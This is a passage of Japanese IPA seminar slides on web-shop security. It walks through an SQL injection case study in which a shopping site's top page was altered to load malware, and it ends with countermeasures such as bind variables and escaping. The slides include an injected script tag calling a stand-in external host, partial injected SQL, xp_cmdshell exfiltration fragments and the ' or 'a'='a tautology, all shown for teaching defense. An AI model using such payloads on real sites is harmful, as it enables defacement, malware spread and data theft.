ュリティ教育にはとてもよい教材だと思いますグッド！」できれば、小学校、中学校、そして高校の授業でこのソフ

トを用いたセキュリティ教育をしていただきたいものです。（出典：情報セキュリティ学院）

4.4 安全なウェブサイト運営入門

z社内教育や大学授業、イベントでの利用も

社内教育

： コンサルティング会社、他

大学授業

：

A大学

イベントでのセキュリティ啓蒙

： 地域ict未来フェスタ2008inとくしま

メーリングリスト

：

N地域地場産業振興センター

4.4 安全なウェブサイト運営入門

zダウンロード

zアンケート協力のお願い

本日配布したＣＤ－ＲＯＭ内に、「安全なウェブ

サイト運営入門」が入っておりますので、是非、

ご利用頂きたく思います。

今後の普及啓発ツール・資料等の作成に活用さ

せていただくため、同封のアンケートにご協力頂

き、記載の電話番号に

ＦＡＸ

をお願い致します。

¾「安全なウェブサイト運営入門」－７つの事件を体験し、ウェブサイトを守り抜け！－

http://www.ipa.go.jp/security/vuln/7incidents/index.html

セキュリティセンター（IPA/ISEC）

http://www.ipa.go.jp/security/

★情報セキュリティ関連相談窓口：

ＴＥＬ ０３（５９７８）７５０９

(平日10:00-12:00、13:30-17:00)

ＦＡＸ ０３（５９７８）７５１８

E-mail： virus@ipa.go.jp (ウイルス関連)

crack@ipa.go.jp (不正アクセス関連)

winny119@ipa.go.jp (Winny関連)

isec-info@ipa.go.jp (その他セキュリティ全般)

ネット通販セキュリティ対策セミナー

ネット通販サイト開発者向け具体的対策

～デモを交えウェブアプリケーション開発時の対策など～

独立行政法人 情報処理推進機構

セキュリティセンター

本コースについて

•

対象

–

インターネット通販事業者のウェブサイト運営者、

運営委託、代行者、開発者の方々

•

ポイント

–

ショッピングサイトにおけるセキュリティ事故につ

いて、デモとケーススタディから脅威と対策の技

術的側面を紹介。

本コースの内容

ケーススタディ

１．

_{SQLインジェクション}

ケーススタディ1

SQLインジェクション

企業サイトがウイルス感染の加害者に

SQLインジェクション

1.1 SQLインジェクションとは

1.2 事例:ショッピングサイトでウイルス感染？

1.3 SQLインジェクション対策のポイント

1.4 SQLインジェクション対策

ケーススタディ 1

1.1 SQLインジェクションとは

•

対象

–

データベースをバックエンドで利用している

ウェブアプリケーション

•

原因

–

データベースへの命令の組み立て方に問題

1.1 SQLインジェクションとは（続き）

•

生じうる脅威

–

データベースを直接操作されてしまう

↓

–

秘密情報、個人情報等の漏えい

–

重要情報の改ざん、破壊

•

ウェブサイト上にウイルスを埋め込まれる

–

任意のコード・コマンドを実行される

•

別のサーバを攻撃する踏み台となる

1.2 事例:ショッピングサイトでウイルス感染？

S h o p p i n g S i t e

About

Search

Login

•

ショッピングサイト

_C社。

•

社員数200名、Windowsのショッピングカートシス

テムを使った中規模ショッピングサイト。会員数10

万人程度。

•

リピーターがついており、アクセスは盛況。

•

最新パッチの適用、ユーザ管理、アクセス制限と、

一通りは対策。

ショッピングサイトの裏側

S h o p p i n g S i t e

About

Search

Login

•

ショッピングカートシステムを自社開発

•

ウェブのコンテンツは

_{DBに格納されており、アク}

セスを受けるとショッピングカートシステムが動的

にページを作成する。

•

販売担当者はショッピングカートシステムの管理

画面から、自分の担当する商品情報を更新する。

•

サーバ群の管理のために、管理者が数名。

img img img li li li ul

お知らせ

div

I

ショッピングサイト上にウイルス

S h o p p i n g S i t e

About

Search

Login

•

ある日突然

_{C社に、「}

ウェブを見たらウイルス対

策ソフトが反応した」「ウェブサイトでウイルスに

感染した」という苦情が複数よせられる。

•

ショッピングサイトにはユーザがページ内容を変

更したり、ファイルをアップロードするような機能

はない。

•

一体どこから？

現在の状態を調査する

•

外部に表示するウェブサイトをメンテナンス用サー

バに切り替え、切り離したサイトを調査。

•

トップページに、悪意あるスクリプトを読みこませる

内容を追加し、ウイルスに感染させようとしていた。

•

他のページには同様の埋めこみは発見できず。

トップページに埋めこまれたHTML

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang=“ja”>

<head>

<title>Welcome to “C” shopping site</title>

<link rel="stylesheet" href="style.css" TYPE="text/css">

<script src=“http：//othersite.example.net/3.js”></script>

</head>

ウイルスの正体は？

•

幸い、最新のアンチウイルスソフトを使う

とウイルスを検知できた。

•

感染のために、ウェブブラウザの複数の

脆弱性が使われている。ページを見るだ

けで感染する悪質なもの。

•

感染すると、マシンに潜み、キーロガー等

の機能でパスワードやカード番号を盗み

だす。

•

アクセスログを見ると、数千人がダウン

ロードしてしまった可能性がある。

参考: 最近のウイルスの動作

•

罠ウェブ経由

/普通のウェブ経由

で感染

•

ブラウザやプラグインの複数の脆弱性をついて侵入を試み

る

•

最初は小さくて流用しやすいプログラム

(ダウンローダ)に感

染させる

•

実際の攻撃は別サイトからダウンロードしたコード

(プログラ

ムそのもの

)が行う

•

何がダウンロードされるかわからない

=対策パッチをあてて

も、そのパッチを掻い潜る次の攻撃手法が使われる

•

ダウンロードや命令には、会社が制限できない内部

→外部

の

HTTP/HTTPSを利用し、

正規の通信に見せかける。

参考

: 近年の標的型攻撃に関する調査研究

http://www.ipa.go.jp/security/fy19/reports/sequential/index.html

まずは感染経路を特定する

どうやってウェブサイトにウイルスが仕組まれたのか？

詳細な調査が必要

•想定1:

サーバへの攻撃？

サーバに侵入され改ざん

•想定2:

内部犯行？

•想定3:

ウェブサイト経由？

ショッピングカートシステムの脆弱性

想定1: サーバへの攻撃？

外部からの攻撃による改ざんを疑う。

•

外部に公開しているのはウェブ用と

メール用のサーバのみ。

_{DBは非公開。}

•

外部からはアクセス制限により、メー

ル

(port 25)と、ウェブ(port 80/443)し

かアクセスできない。

•

ソフトウェアは随時アップデートしてお

り、既知の脆弱性の問題はない。

•

攻撃されたとすれば未知の脆弱性。

他をまず調査するべき。

ウェブ

サーバ

DB

サーバ

サーバへの攻撃?

(想定1)

‘

メール

サーバ

‘

想定2： 内部犯行？

内部の人による書き換えを疑う。

•

マシンに直接ログインできるのは

管理者数人のみ。

•

商品の担当はショッピングカート

システムにログインして、担当個

所を編集できるだけの権限しか

持たない。トップページは無理。

•

クロスチェックしたが、システムの

ログイン記録と、ショッピングカー

トシステムのログには、トップペー

ジの改ざんの記録や不自然なロ

グの欠損は無かった。

•

内部からの可能性は薄そう。

ウェブサーバ

DBサーバ

内部ユーザ

インターネット

内部犯行?

(想定2)

‘

‘

想定3: ウェブサイト経由？

•

ウェブサーバのログを見ていくと、エ

ラーログの中に不審な文字列。

•

一見して

SQL文のように見えるが、エ

ラー。

•

データベースにも同じようなログが・・・。

•

エラー表示は消しているので、

_{SQL イ}

ンジェクションではないはず・・・。

/shop/cart/?no=

...

%20

SELECT

%20

...

%20

FROM

%20

...

%20

WHE

RE

%20

...

%20

HAVING

%20

...

(...)

/shop/cart/?no=

...

%20

SELECT

%20

...

%20

FROM

%20

...

%20

WHE

RE

%20

...

%20

ORDER

%20

...

ウェブサーバのエラーログ

ウェブサーバ

DBサーバ

‘

‘

ウェブサイト

経由？

(想定3)

SQLインジェクションの可能性あり

•

詳しく調べた所、データベースのログに、定型外の、

データの内容を更新する

_{SQL 文が記録されてい}

た。

•

これは、ショッピングカートシステムで使うデータ

ベース内容を直接書換える

_{SQL文と判明。}

•

ショッピングカートシステムのログに残らない形で

トップページを改ざん。悪意あるスクリプトを読みこ

ませる内容を書きこんでいた。

UPDATE

pages

SET

"

created_at

" =

'2006-09-05 16:19:46

',

"

template

" = '

toppage.tmpl

', "

verified

" = 1, "

role

" = NULL,

"

published

" = 0, contents=“

<html><head>

...

ウェブの改ざんだけではなかった

•

データベースのログを更に確認。

•

順番通りに実行すると、データベースの内容

を元に、その内容を

OS のコマンドで送信す

るという内容。

•

ウェブの改ざんの裏で、情報漏えいも起きた

可能性があった。

•

しかし、デフォルトで利用できない機能のた

め問題なし。

...

EXECUTE xp_cmdshell

‘

echo

’

|| (

SELECT

...

FROM

...

) ||

...

...

EXECUTE xp_cmdshell

‘

echo

’

|| (

SELECT

...

FROM

...

) ||

...

運営者としての対応

S h o p p i n g S i t e

About

•

他にあやしいものが無いか、サーバやデータベースの内容を全

面的にチェック。

•

ショッピングカートシステムを使わずに、おわびと経緯の解説文

章をウェブページに。駆除方法の提供。

•

ショッピングカートシステムを修正。本来のウェブページは、

ショッピングカートシステムが修正された後

に公開。ウェブの営

業停止による金銭的被害。

•

多層防御の一環として、ウェブアプリケーションファイアウォー

ル（

WAF）やサーバ用のアンチウイルス製品を導入。

重要なお知らせ

◆

弊社ウェブサイトにおけるウイルス掲載の問題に

ついて

◆

XXXX/XX～XX/XXの間アクセスされたお客様へ

参考：企業における情報セキュリティ事象被害額調査

http://www.ipa.go.jp/security/fy18/reports/virus-survey/index.html

何が起こっていたのか

S h o p p i n g S i t e

About

Search

Login

•

ウェブサイトに

_{SQL インジェクションの脆弱性が}

あり、そこを攻撃された。

•

SQL インジェクションにより、ショッピングカートシ

ステムのログに残らない形で、ウェブページを改

ざんされた。

•

さらに、

_{OS コマンドが実行されて情報漏えいを起}

こされる可能性があった。

データ

ベース

ウェブ

アプリケーション

悪意ある

攻撃者

[HTTPでのアクセス]

/shop/cart/?no=

...

%20SELECT%20

..

[SQLでのアクセス]

問題のポイント

•

自社開発ショッピングカートシステムに未知

の脆弱性があり、自社ウェブサイト経由で、

外部からの

SQL文の挿入、およびデータ

ベースの改ざんが可能であった。

•

SQL文を構築する際のコーディング上の問

題。

参考： 脆弱性関連情報を発見してしまった場合は、

脆弱性関連情報に関する届出について

http://www.ipa.go.jp/security/vuln/report/

1.3 SQLインジェクション対策のポイント

•

ウェブアプリケーションで修正の必要がある。

•

データベースの主要

4機能(CRUD)を制御さ

れる。

脅威は情報漏えいに限らない。

– Create(作成):

偽データの追加の脅威

– Read (読込):

データの漏えいの脅威

– Update(更新):

偽データでの上書きの脅威

– Delete(削除):

データの削除の脅威

•

他の脆弱性を利用するための前準備にも使

われる。

$p

=foo

'

or

'

a

'

=

'

a の場合：

SELECT * FROM a WHERE id=' ';

$p

=foo の場合：

SELECT * FROM a WHERE id=' ';

$p

=foo の場合：

SELECT * FROM a WHERE id='foo';

なぜ SQL 文の挿入が可能か？

•

特別な意味を持つ記号文字

の扱いが不適切。

SELECT * FROM a WHERE id='

$p

';

$p

=foo

'

or

'

a

'

=

'

a の場合：

SELECT * FROM a WHERE id='foo

'

or

'

a

'

=

'

a';

変数中の記号文字が意味のある文字として解釈される。

例： ’（シングルクォート）：テキスト文字の引用符

1.4 SQLインジェクション対策

•

根本的解決

–

エスケープ処理

•

バインド機構の利用

•

バインド機構以外でのエスケープ

–

エスケープ以前の問題

•

保険的対策

–

エラーメッセージの非表示

–

データベースアカウントの権限見直し

–

その他の対策